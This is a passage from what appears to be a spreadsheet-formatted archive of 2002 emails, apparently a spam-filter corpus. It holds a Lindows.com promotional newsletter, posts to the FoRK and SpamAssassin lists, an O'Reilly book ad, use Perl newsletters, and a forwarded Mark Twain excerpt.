machines in under 5 minutes. It's point- and-shoot easy - easier than any other operating system (Microsoft products included). See for yourself at  .   The other myth is that Linux is just for the server and none of the graphical programs --which desktop users have come to rely on-- exist. Not only have many of the Linux software programs made quantum leaps over the last couple of years, but they've gotten quite good at reading and writing Microsoft formats. The easiest way to experience these products is via the Click-N-Run   Warehouse.  Here's a quick list of some of the quality programs available today in the Warehouse  all downloaded and installed with a single click: OpenOffice - This one installation will equip a computer with an impressive collection of productivity programs each of which will open the corresponding Microsoft file format and allow you to edit files and swap them with Microsoft counterparts.  Programs included are: OpenOffice Writer - Word processor (reads Microsoft Word docs)  OpenOffice Calc - Spreadsheet (reads Microsoft Excel)  OpenOffice Impress- Presentation package (reads Microsoft PowerPoint) OpenOffice Draw - A vector based drawing program Click here   for a great tutorial on getting to know OpenOffice. GIMP  If you are familiar with Adobe's Photoshop, you'll want to Click-N-Run GIMP. It's a powerful image editor.    Evolution  For those used to Microsoft's Outlook email program Evolution will make them feel right at home. Check out how easy it is to use  . Flowchart Pro, which is similar to Microsoft's Visio, is a  rich charting program that makes it possible to create flow charts and organizational charts, plus more. See how easy it for yourself, visit Flowchart Pro at  This is just a handful of the quality programs available in the Warehouse  that make Linux a practical choice for the desktop today. And if you're still not convinced, then do the math.   For  a total cost of $499  , including all  software, computer users save  more than $800  for a complete system.  With such major price differentials between the two similarly equipped systems, any business, school or home will find their computing dollars stretched much further running LindowsOS.  Michael Robertson Please visit   to answers questions you may have about LindowsOS or Lindows.com. Bringing Choice to Your Computer!  LindowsOS is presently available on LindowsOS Certified Computers being offered from Lindows.com   Builder partners.  The General Release of LindowsOS (available now for download and preview to Lindows.com   Insider partners) will be made available later this year for those wishing to install and run LindowsOS on their existing computer hardware.  The General Release version will support a wider range of computer hardware and includes unique features such as a "Friendly-Install" alongside an existing MicrosoftR Windows operating system, a streamlined installation process which requires no computer knowledge, and the ability to run a select set of "bridge" Windows-compatible programs. For more information see   LindowsOS and Lindows.com are trademarks of Lindows.com, Inc. LinuxR is a registered trademark of Linus Torvalds. MicrosoftR WindowsR operating system is a registered trademark or service mark of the Microsoft Corporation. mm19 ___________________________________________________________ To change your mailing list options please go to  ------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d Content-Type: text/html; 	charset="us-ascii" Content-Transfer-Encoding: quoted-printable Message Â  If this message is = not=20 displaying properly, click here to = launch it=20 in your browser. Michaelâ€™s = Minute: Do the=20             Math...Dispel the Myths  Â  A = reporter came=20             by the Lindows.com offices = last Friday.=20             He told me that he wanted to try and use=20             LindowsOS to write a story, but he didn't think it was = possible=20             because his office used Microsoft Word .doc files. I asked = him to=20             have a seat and watch. Â  I = turned on the=20             Walmart.com = computer and=20             then clicked on the running man  Â which took me to the Click-N-Run Warehouse = where I=20             installed OpenOffice = using=20             Click-N-Run. I then clicked the "Run It"Â  button which = opened=20             the word processor OpenOffice Writer. I then typed "Linux = is=20             ready for the desktop and consumers can save hundreds using=20             LindowsOS." I selected "Save as Microsoft=20             Word." The = reporter was=20             not only surprised, he was amazed. Like many reporters, he = was under=20             the impression that Linux was only for servers. The simple = word=20             processor demonstration went a long way to show him = otherwise. For=20             Linux to become a driving force in desktop computing it will = have to=20             overcome a couple of myths.Â  The = first myth=20             is that Linux is too hard to install and configure. That may = have=20             been true in the past, but weâ€™ve annihilated this myth = with the=20             latest version of LindowsOS --which installs on most = machines in=20             under 5 minutes. It's point- and-shoot easy - easier than = any other=20             operating system (Microsoft products included). See for = yourself at=20             [URL]www.tryoutlinux.com[/URL]             Â  The = other myth=20             is that Linux is just for the server and none of the = graphical=20             programs --which desktop users have come to rely on-- exist. = Not=20             only have many of the Linux software programs made quantum = leaps=20             over the last couple of years, but they've gotten quite good = at=20             reading and writing Microsoft formats. The easiest way to = experience=20             these products is via the Click-N-Run=20             Warehouse. Â Here's a quick list of = some of=20             the quality programs available today in the Warehouse all = downloaded=20             and installed with a single click: OpenOffice - This one installation will = equip a=20             computer with an impressive collection of productivity = programs each=20             of which will open the corresponding Microsoft file format = and allow=20             you to edit files and swap them with Microsoft counterparts. = [URL]www.lindows.com[/URL] =20             Â Programs included are: OpenOffice=20             Writer - Word processor (reads Microsoft Word docs)=20             OpenOffice Calc - Spreadsheet (reads Microsoft = Excel)=20             OpenOffice Impress- Presentation package (reads = Microsoft=20             PowerPoint)OpenOffice Draw - A vector based = drawing=20             program Click here for = a great=20             tutorial on getting to know OpenOffice. GIMP ([URL]www.lindows.com[/URL]             If you are familiar with Adobe's = Photoshop,=20             you'll want to Click-N-Run GIMP. It's a powerful image = editor.=20             Â  Evolution=20             Â ([URL]www.lindows.com[/URL] =             For those used to Microsoft's Outlook email program = Evolution will=20             make them feel right at home. Check out how easy it is to use. Flowchart=20             Pro, which is similar to Microsoftâ€™s Visio, is a = Â rich=20             charting program that makes it possible to create flow = charts and=20             organizational charts, plus more. See how easy it for = yourself,=20             visit Flowchart Pro at Â [URL]www.lindows.com[/URL] artpro This=20             is just a handful of the quality programs available in the = Warehouse=20             ([URL]www.lindows.com[/URL] =             that make Linux a practical choice for the desktop today. = And if=20             you're still not convinced, then do the math. ForÂ  a total=20             cost of $499, = including=20             allÂ  software, computer users saveÂ  more than = $800Â =20             for a complete system.  With = such major=20             price differentials between the two similarly equipped = systems, any=20             business, school or home will find their computing dollars = stretched=20             much further running LindowsOS.  Michael = Robertson Please visit support.lindows.com = to=20             answers questions you may have about LindowsOS or=20             Lindows.com. Bringing Choice to Your = Computer!=20              LindowsOS is presently available on LindowsOS = Certified=20             Computers being offered from Lindows.com Builder = partners.Â =20             The General Release of LindowsOS (available now for download = and=20             preview to Lindows.com Insider = partners) will be=20             made available later this year for those wishing to install = and run=20             LindowsOS on their existing computer hardware.Â  The = General=20             Release version will support a wider range of computer = hardware and=20             includes unique features such as a = â€œFriendly-Installâ€ alongside an=20             existing MicrosoftÂ® Windows operating system, a = streamlined=20             installation process which requires no computer knowledge, = and the=20             ability to run a select set of "bridge" Windows-compatible = programs.=20             For more information see [URL]www.lindows.com[/URL]Â  LindowsOS and Lindows.com are = trademarks=20             of Lindows.com, Inc. LinuxÂ® is a registered trademark of = Linus=20             Torvalds. MicrosoftÂ® WindowsÂ® operating system is a = registered=20             trademark or service mark of the Microsoft = Corporation. mm19 __________________________________________________________= _To change your mailing list options please = go to [URL]www.lindows.com[/URL]&lt;= /P&gt; ------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d--</t>
  </si>
  <si>
    <t>www.tryoutlinux.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com www.lindows.com</t>
  </si>
  <si>
    <t>To: FoRK@xent.com\nFrom: Wayne E Baisley &lt;baisley@alumni.rice.edu&gt;\nDate: Tue, 17 Sep 2002 23:20:31 -0500</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 23:20:31 -0500</t>
  </si>
  <si>
    <t>Re: storage bits</t>
  </si>
  <si>
    <t>At Fermi (yes I'm back there; long story), we're buying 4U systems like \nthe fiscal year is ending.  We have ~20 ASA IR4US1 systems (not pushing \nthem, there are some other similar units available), with 60 more on \norder.  They're 2-1/2 TB for $10K, although we add a separate IDE or \nSCSI system disk, because the 3Ware RAID controllers can saturate. \nIntel SDS2 motherboard, 2 1.4GHz P3s, 2 GB ram, 2 3Ware 7850 Raid \ncontrollers, 16 160GB Maxtors, SysKonnect gigabit enet, Fermi RedHat 7.3.\n\n[URL]http://www.asacomputers.com[/URL]\n\nThere's some interesting info at:\n\n[URL]http://mit.fnal.gov[/URL]\n\nWe've decided to go with XFS (which Linus has just merged into the 2.5 \ntree), mostly because none of the other journaled fs's can maintain &gt;30 \nGB/s rates with a nearly full filesystem (mostly GB files) with random \ndeletions (we use these systems for caching our 2 petabyte tape store). \n  Ext3 almost did it but dropped from from ~38MB/s to 10 with random \ndeletions, and didn't want to do direct io at all.  Only concern is an \noccasional system lock-up we haven't chased down yet.  A load avg &gt; 100 \nis always a patio of fun.\n\nOddly, even fairly beefy systems like these will breathe hard to keep up \nwith the new STK 9940B tape drives, which crank along at a steady \n30GB/s.  And you oldforktimers will remember "doofus" my old file server \nsystem.  It would only take 2.1" of rackspace now, instead of 14 racks.\n\nCheers,\nWayne</t>
  </si>
  <si>
    <t>http://www.asacomputers.com http://mit.fnal.gov</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Tue, 17 Sep 2002 21:41:40 -0500 (CDT)</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 21:41:40 -0500 (CDT)</t>
  </si>
  <si>
    <t>boycotting yahoo</t>
  </si>
  <si>
    <t>Because of this:\n[URL]http://hrw.org[/URL]\nthere are several of us who are in the BDSM lifestyle who are trying to \nencourage our local groups to find alternatives to yahoo groups as a way \nof communicating with each other.  I've set up a place to have maillists \non my server for any group who wants to use it, but I was wondering if \nanyone knows of an alternative that allows all the bells and whistles that \nyahoo has, such as reminders, file storage, calendars, etc.  Anyone?\nTIA,\nCindy\n\n-- \n"I don't take no stocks in mathematics, anyway" --Huckleberry Finn</t>
  </si>
  <si>
    <t>http://hrw.org</t>
  </si>
  <si>
    <t>To: Justin Mason &lt;zzz-meerkat@example.com&gt;\nFrom: O'Reilly.&amp;.Associates@dogma.slashnull.org\nDate: Tue, 17 Sep 2002 17:07:02 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 17:07:02 -0700</t>
  </si>
  <si>
    <t>O'Reilly.&amp;.Associates@dogma.slashnull.org</t>
  </si>
  <si>
    <t>Justin Mason &lt;zzz-meerkat@example.com&gt;</t>
  </si>
  <si>
    <t>JavaServer Pages updated</t>
  </si>
  <si>
    <t>Filled with useful examples and the depth, clarity, and \nattention to detail that made the first edition so popular \nwith web developers, the just-released "JavaServer Pages,  \n2nd Edition" (Bergsten, $44.95) is completely revised \nand updated to cover the substantial changes in the \n1.2 version of the JSP specifications, and includes \ncoverage of the new JSTL Tag libraries--an eagerly \nanticipated standard  set of JSP elements for the tasks  \nneeded in most JSP  applications, as well as thorough \ncoverage of Custom Tag Libraries.  \n\nWhat people said about the first edition:\n\n"an excellent printed resource on JSPs...I have \nbeen extremely impressed by its depth, clarity,\n and attention to detail. " \n--Reuven M. Lerner, Linux Journal\n\n"This is a great book: it was written by a key \ncontributor not only to the JSP specification, \nbut also to the JSP and  Servlet reference \nimplementations. Filled with useful examples,\n it stands as an important text in the adoption of \nJSP in the market." \n--Eduardo Pelegri-Llopart, lead JSP Specification Engineer.\n\nTo order your copy or for more information, see:\n[URL]http://www.oreilly.com[/URL]\nor call 1-800-998-9938\nor email orders@oreilly.com\n\nJavaServer Pages, 2nd Edition  \nBy Hans Bergsten\n0-596-00317-X, Order Number: 317X\n684 pages, $44.95 US $69.95 CA Â£31.95 UK\n-----------------------------------------------------------------\nIf you want to cancel a subscription to this newsletter,\ngo to [URL]http://www.oreillynet.com[/URL] and \nde-select any newsletters you no longer wish to receive.\n\nFor non-automated human help email help@oreillynet.com\n-----------------------------------------------------------------</t>
  </si>
  <si>
    <t>http://www.oreilly.com http://www.oreillynet.com</t>
  </si>
  <si>
    <t>To: 0xdeadbeef@petting-zoo.net\nFrom: gkm@petting-zoo.net (glen mccready)\nDate: Tue, 17 Sep 2002 15:15:57 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 15:15:57 -0700</t>
  </si>
  <si>
    <t>Virgin's latest airliner.</t>
  </si>
  <si>
    <t>Forwarded-by: William Knowles  [URL]http://www.thesun.co.uk[/URL],,2-2002430339,00.html By PAUL CROSBIE Sep 16, 2002 VIRGIN'S latest airliner is being revamped after randy passengers discovered a tiny cabin was just the place to join the Mile High Club. The 130million Airbus 340-600 is fitted with a 5ft x 4ft mother and baby room with a plastic table meant for changing nappies. But couples keep wrecking it by sneaking in for a quick bonk. Virgin has replaced the table several times even though the plane only came into service a few weeks ago. It is named Claudia Nine after sexy model Claudia Schiffer, 32, who launched it in July. Now Virgin bosses have asked Airbus to build a stronger table. At first, German engineers responsible for the jet's interior were baffled by the problem. The table is designed to take the weight of a mum and baby. One Airbus worker said: "We couldn't work it out. Then the penny dropped. It didn't occur to the Germans that this might happen. It caused great amusement." The firm say the cost of strengthening the tables will be about 200. A Virgin spokeswoman said: "Those determined to join the Mile High Club will do so despite the lack of comforts. "We don't mind couples having a good time but this is not something that we would encourage because of air regulations." The new Airbus is the world's longest airliner, with teasing slogan "Mine is bigger than yours". Virgin is using it on flights to the Far East and the US.</t>
  </si>
  <si>
    <t>http://www.thesun.co.uk</t>
  </si>
  <si>
    <t>To: 0xdeadbeef@petting-zoo.net\nFrom: gkm@petting-zoo.net (glen mccready)\nDate: Tue, 17 Sep 2002 14:51:25 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 14:51:25 -0700</t>
  </si>
  <si>
    <t>I'm a tad furry...</t>
  </si>
  <si>
    <t>Forwarded-by: Nev Dull  Forwarded-by: newsletter@tvspy.com Excerpted: ShopTalk - September 13, 2002 "I'm a tad furry, so animal rights issues come into play." 	Robin Williams, telling Entertainment Weekly why he won't do 	nude scenes in movies. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Johnny U: Johnny Unitas was the National Football League's most valuable player twice - and he led Baltimore to victory in "Super Bowl Five." For those of you younger than 30: this WAS modern football.  The game was played on artificial turf. (Richard Burkard/ [URL]http://www.Laughline.com[/URL] Announcement: How telling is it that the death of Johnny Unitas was announced by the Baltimore Ravens - and not the Colts, who now play in Indianapolis?  When the Colt owners moved out of Baltimore years ago, they apparently left all the history books behind. (Burkard) Dick Disappears: Vice President Dick Cheney remains at an undisclosed location.  The move is for security reasons.  The Bush Administration is trying to keep him at a safe distance from would-be subpoenas. (Alan Ray - [URL]http://www.araycomedy.com[/URL] Noelle Nabbed: Jeb Bush's daughter Noelle is in trouble with the law again.  When she was a child, her dad would read her favorite bedtime story.  Goldilocks and the Three Strikes. (Ray)</t>
  </si>
  <si>
    <t>http://www.Laughline.com http://www.araycomedy.com</t>
  </si>
  <si>
    <t>To: Chuck Murcko &lt;chuck@topsail.org&gt;\nFrom: "Owen Byrne" &lt;owen@permafrost.net&gt;\nDate: Tue, 17 Sep 2002 14:38:52 -0300</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 14:38:52 -0300</t>
  </si>
  <si>
    <t>"Owen Byrne" &lt;owen@permafrost.net&gt;</t>
  </si>
  <si>
    <t>Chuck Murcko &lt;chuck@topsail.org&gt;</t>
  </si>
  <si>
    <t>Re: Hanson's Sept 11 message in the National Review</t>
  </si>
  <si>
    <t>On Tue, Sep 17, 2002 at 10:19:13AM -0700, Chuck Murcko wrote:\n&gt; Probably because we have this pesky 1st Amendment thing here. Still, \n&gt; lots of us in the States have developed a disturbing tendency to shout \n&gt; down or (in recent years) shackle in legal BS opinions, thoughts, and \n&gt; individual behaviors we don't agree with.\n&gt; \n\nExcept that parroting the party line doesn't really require much\nfreedom of speech. Now if you had posted something from a left of\ncenter source, you would have been shouted down in flames, buried in \nad hominem attacks, and probably get your name added to an FBI list. \n\n \nBesides the basic rule in the United States now is "I'll defend your\nrights to say anything you want, but if it isn't appropriately\nneoconish, well, don't expect to work":\n\n\nHHS Seeks Science Advice to Match Bush Views\n\nBy Rick Weiss\nWashington Post Staff Writer\nTuesday, September 17, 2002; Page A01\n\nThe Bush administration has begun a broad restructuring of the\nscientific advisory committees that guide federal policy in areas such\nas patients' rights and public health, eliminating some committees\nthat were coming to conclusions at odds with the president's views and\nin other cases replacing members with handpicked choices. \n...\n[URL]http://www.washingtonpost.com[/URL]\n\nOwen</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: &lt;michael@i-magery.com&gt;\nDate: Tue, 17 Sep 2002 13:41:50 -0400</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 13:41:50 -0400</t>
  </si>
  <si>
    <t>&lt;michael@i-magery.com&gt;</t>
  </si>
  <si>
    <t>FW: Wanna buy a nuke?</t>
  </si>
  <si>
    <t>I have been told to take anything read in Pravda with a grain of salt...\nbut\nthis article certainly looks impressive when paired together with this other\none from the associated press...\n\nJust the concept makes me shudder, imagining how easy it must be to smuggle\nthese things around some parts of Europe right now.\n\nHopefully, it's just my imagination.\n\n-- Michael Cummins\n   Fort Lauderdale, FL\n\n----------------------------------------------------------------------------\n----\n[URL]http://english.pravda.ru[/URL]\n11:14 2002-09-13\n200 SOVIET NUKES LOST IN UKRAINE\n----------------------------------------------------------------------------\n----\n[URL]http://story.news.yahoo.com[/URL]\n20903/ap_on_re_eu/ukraine_iraq_3\nUkraine-Iraq Arms Deals Alleged\nTue Sep 3, 6:07 PM ET\nBy TIM VICKERY, Associated Press Writer\n----------------------------------------------------------------------------\n----\n\nRohit Khare - I wish you the best of luck in your search.  I found *my* Very\nSpecial Lady when I was intentionally looking elsewhere... you never know\nwhat\nlurks around every corner.  Love certainly has its *own* agenda.\n\n\n\n\n---------------------------------------------------------------\nScanned for viruses by the advanced mail servers at advantageservices.net</t>
  </si>
  <si>
    <t>http://english.pravda.ru http://story.news.yahoo.com</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Tue, 17 Sep 2002 10:18:44 -0400</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 10:18:44 -0400</t>
  </si>
  <si>
    <t>Harvest Moon</t>
  </si>
  <si>
    <t>[URL]http://spineless.org[/URL]\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"</t>
  </si>
  <si>
    <t>http://spineless.org http://Golux.Com http://Apache-Server.Com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Chris &lt;cfortune@telus.net&gt;\nDate: Tue, 17 Sep 2002 09:20:14 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 09:20:14 -0700</t>
  </si>
  <si>
    <t>Chris &lt;cfortune@telus.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Running SA as a user app?</t>
  </si>
  <si>
    <t>Can anybody point me to a project/FAQ similar to this:?\n\n1. Perl script fetches POP mail from a distant server\n2. mail is fed to SA, running as a standalone module in my user account\n3. SA spits out results back to perl script.\n4. Script deletes offending mail.\n\nI don't have root access.  I don't need a MTA.\n\n=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0\nChris Fortune\nFortune's Web Computer Services\nNelson, BC, Canada\nV1L 2W3\n\nph#: 250 505-5012\nemail: cfortune@telus.net\nwebsite: [URL]http://cfortune.kics.bc.ca[/URL]\n\n=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0=0\n\n\n\n-------------------------------------------------------\nSponsored by: AMD - Your access to the experts on Hammer Technology! \nOpen Source &amp; Linux Developers, register now for the AMD Developer \nSymposium. Code: EX8664 [URL]http://www.developwithamd.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://cfortune.kics.bc.ca http://www.developwithamd.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Tue, 17 Sep 2002 06:50:20 -0700</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 06:50:20 -0700</t>
  </si>
  <si>
    <t>Re: RSA (repost)</t>
  </si>
  <si>
    <t>"Adam L. Beberg" wrote:\n&gt; \n&gt; So, who has done RSA implementation before?\n&gt; Having a typo-I-cant-spot problem with my CRT...\n&gt; \n&gt; - Adam L. "Duncan" Beberg\n&gt;   [URL]http://www.mithral.com[/URL]\n&gt;   beberg@mithral.com\n&gt; \n&gt; [URL]http://xent.com[/URL]\n\nDone a ton of them, both with and without their\nstuff.  With is definitely easier.[1]\n\nGreg\n\n[1] [URL]http://www.endeavors.com[/URL]\n\n\n\n\n\n Endeavors Technology and RSA Security Form Strategic Partnership to \n Enhance SSL Performance in Secure, Enterprise-Scalable P2P Computing\n\nEndeavors Technology and RSA Security combine their respective peer-to-peer Magi Enterprise \nWeb collaboration and RSA BSAFE software for SSL users to instantly extend security and improve performance\nof \ndesktop and corporate data sharing, and Web interaction between workgroups inside and across corporations.\n\nIrvine (CA) and Cambridge (UK), September 12, 2002 - Secure web collaboration software leader Endeavors\nTechnology, Inc. today\nannounced a technology sharing and marketing agreement with RSA Security Inc. the most trusted name in\ne-security. This strategic\npartnership is aimed at extending the security and improving the performance of the standard SSL security\nprotocol used by every e-based\ndesktop, laptop and server. \n\nUnder the terms of the agreement, RSA Security's trusted security tools are embedded into Endeavors\nTechnology's award-winning Magi\nEnterprise software product. The combined solution enables IT managers and users to simply extend security and\nencryption to every\nMagi-enabled device for the direct device-to-device sharing and interaction of corporate data and workflow\nbetween workgroups within and\nbeyond the enterprise.\n\nSecure collaboration between desktops and corporate systems calls for enterprises to build complex and costly\nnetwork infrastructures. This\ncombination of technologies from the two companies eliminates both overheads, and also the need for specific\nsecurity tools for each desktop\napplication such as Microsoft Project. With Magi's secure RSA Security-based peer environment, collaboration\ncan now be rapidly, easily and\nsecurely extended across all devices and company firewalls, and workgroups can interact with colleagues,\npartners and clients without concern\nin compromising corporate information. This brings true Internet scaling to corporations needing to interact\nhighly securely with strong\nencryption and authentication across firewalls.\n\n"In these challenging times, there can be no compromise in safeguarding corporate data and knowledge," says\nBernard Hulme, chairman and\nCEO of Endeavors Technology. "Embedding RSA Security encryption software into Magi products provides IT\nmanagers with added\nassurance, speed and cost savings, and a proven security net to accelerate the deployment of business-centric\npeer-to-peer computing"\n\nEndeavors Technology joins the RSA Secured Partner Program. The program is designed to ensure complete\ninteroperability between\npartner products and RSA Security's solutions including RSA SecurID two-factor authentication, RSA\nClearTrust Web access\nmanagement, RSA BSAFE encryption and RSA Keon digital certificate management.\n\nThe strategic partnership paves the way for Magi Enterprise to bear the RSA Secured brand on product packaging\nand advertising, be listed in\nRSA Secured Partner Solutions directories, and have RSA Security's out-of-the-box, certified interoperability.\nIt will also lead to joint\nmarketing and promotional activities between the two firms, mutual field sales engagement opportunities on\njoint accounts, and 24x7 worldwide\nbusiness continuity support.\n\n"Endeavors Technology is taking a leadership role by providing the highest-level of security in its enterprise\nproducts and streamlining the\ndeployment process for IT managers," says Stuart Cohen, director of partner development at RSA Security. "By\ncombining our products,\nenterprise customers have a solution that provides encryption and authentication across firewalls."\n\nAbout Magi\nMagi Enterprise 3.0, an award-winning web collaboration system, transforms today's Web into a highly secure\ninter- and intra-enterprise\ncollaboration network. For the first time, enterprises can implement ad-hoc Virtual Private Networks for\ncollaboration very rapidly and\naffordably without disrupting existing applications, networks or work practices. Magi Enterprise 3.0 does this\nby effectively transforming\nunsecured, "read-only" Web networks into two-way trusted and transparent collaboration environments, through\nthe use of such features as\ncross-firewall connections, advanced data extraction, an intuitive graphical interface, and universal name\nspaces generating "follow me URLs"\nfor mobile professionals.\n\nAbout RSA Security, Inc.\nRSA Security Inc., the most trusted name in e-security, helps organizations build secure, trusted foundations\nfor e-business through its RSA\nSecurID two-factor authentication, RSA ClearTrust Web access management, RSA BSAFE encryption and RSA Keon\ndigital certificate\nmanagement product families. With approximately one billion RSA BSAFE-enabled applications in use worldwide,\nmore than ten million RSA\nSecurID authentication users and almost 20 years of industry experience, RSA Security has the proven\nleadership and innovative technology to\naddress the changing security needs of e-business and bring trust to the online economy. RSA Security can be\nreached at\n[URL]www.rsasecurity.com[/URL]\n\nAbout Endeavors Technology, Inc.\nEndeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing and network infrastructure vendor\nTadpole Technology plc\n([URL]www.tadpole.com[/URL], which has plants and offices in Irvine and Carlsbad (California), and Cambridge, Edinburgh,\nand Bristol (UK). For further\ninformation on Endeavors' P2P solutions, call 949-833-2800, email to p2p@endeavors.com, or visit the company's\nwebsite\n[URL]www.endeavors.com[/URL] \n\n\nCopyright 2002 Endeavors Technology, Inc. Magi, and Magi Enterprise are registered trademarks of Endeavors\nTechnology, Inc. RSA, BSAFE, ClearTrust, Keon, SecurID, RSA Secured and The Most\nTrusted Name in e-Security are registered trademarks or trademarks of RSA Security Inc. in the United States\nand/or other countries. All other products and services mentioned are trademarks of their\nrespective companies. \n\n\n\n            2002 Endeavors Technology, Inc., 19600 Fairchild, Suite 350, Irvine, CA 92612, phone\n949-833-2800, fax 949-833-2881, email info@endeavors.com.\n                           All rights reserved; specifications and descriptions subject to change without\nnotice.</t>
  </si>
  <si>
    <t>http://www.mithral.com http://xent.com http://www.endeavors.com www.rsasecurity.com www.tadpole.com www.endeavors.com</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 17 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-17</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * New Perl Mongers Web Site\n    * Java vs. Perl\n    * This Week on perl5-porters (9-15 September 2002)\n\n+--------------------------------------------------------------------+\n| New Perl Mongers Web Site                                          |\n|   posted by KM on Monday September 16, @08:41 (groups)             |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]davorg writes "Leon Brocard has been working hard to update the\n[1]Perl Mongers web site. We're still going thru the process of cleaning\nup the data about the Perl Monger groups, so if you see something that\nisn't quite right then please [2]let us know."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:dave@dave.org.uk\n    1. [URL]http://www.pm.org[/URL]\n    2. mailto:user_groups@pm.org\n\n\n+--------------------------------------------------------------------+\n| Java vs. Perl                                                      |\n|   posted by pudge on Monday September 16, @11:15 (java)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nIt seems the older Perl gets, the more willing people are to believe that\nit sucks, without any reasonable facts. [0]davorg writes "You may have\nseen the article [1]Can Java technology beat Perl on its home turf with\npattern matching in large files? that there has been some debate about on\nboth #perl and comp.lang.perl.misc today. One of the biggest criticisms\nof the article was that the author hasn't published the Perl code that he\nis comparing his Java with."\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:dave@dave.org.uk\n    1. [URL]http://developer.java.sun.com[/URL]\n\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (9-15 September 2002)                   |\n|   posted by rafael on Monday September 16, @16:17 (summaries)      |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nThis was not a very busy week, with people packing for YAPC::Europe, and\nall that... Nevertheless, the smoke tests were running, the bug reports\nwere flying, and an appropriate amount of patches were sent. Read about\nprintf formats, serialized tied thingies, built-in leak testing, syntax\noddities, et alii.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.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pm.org http://use.perl.org http://use.perl.org http://use.perl.org http://developer.java.sun.com http://use.perl.org http://use.perl.org http://use.perl.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 17 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-17</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nNew Perl Mongers Web Site\n    posted by KM on Monday September 16, @08:41 (groups)\n    [URL]http://use.perl.org[/URL]\n\nJava vs. Perl\n    posted by pudge on Monday September 16, @11:15 (java)\n    [URL]http://use.perl.org[/URL]\n\nThis Week on perl5-porters (9-15 September 2002)\n    posted by rafael on Monday September 16, @16:17 (summarie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Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 17 Sep 2002 00:43:39 -0400</t>
  </si>
  <si>
    <t>Tue, 17 Sep 2002 00:43:39 -0400</t>
  </si>
  <si>
    <t>&lt;nettime&gt; The War Prayer</t>
  </si>
  <si>
    <t>--- begin forwarded text Date: Mon, 16 Sep 2002 14:57:27 -0700 To: nettime-l@bbs.thing.net From: Phil Duncan  Subject:  The War Prayer Sender: nettime-l-request@bbs.thing.net Reply-To: Phil Duncan  The following prayer is from a story by Mark Twain, and was quoted by Lewis Laphan in the October issue of Harper's magazine. It occurs at the very end of an excellent article which I recommend to you. In the story, an old man enters a church where the congregation has been listening to an heroic sermon about "the glory to be won in battle by young patriots armed with the love of God." He usurps the pulpit and prays the following: "O Lord our God, help us to tear their soldiers to bloody shreads with our shells; help us to cover their smiling fields with the pale forms of their patriot dead; help us to drown the thunder of the guns with the shrieks of their wounded, writhing in pain; help us to lay waste their humble homes with a hurricane of fire; help us to wring the hearts of their unoffending widows with unavailing grief; help us to turn them out roofless with their little children to wander unfriended the wastes of their desolated land in rags and hunger and thirst, sports of the sun flames in summer and the icy winds of winter, broken in spirit, worn with travail, imploring Thee for the refuge of the grave and denied it -- for our sakes who adore Thee, Lord, blast their hopes, blight their lives, protract their bitter pilgrimage, make heavy their steps, water their way with their tears, stain the white snow with the blood of their wounded feet! We ask it, in the spirit of love, of Him Who is the 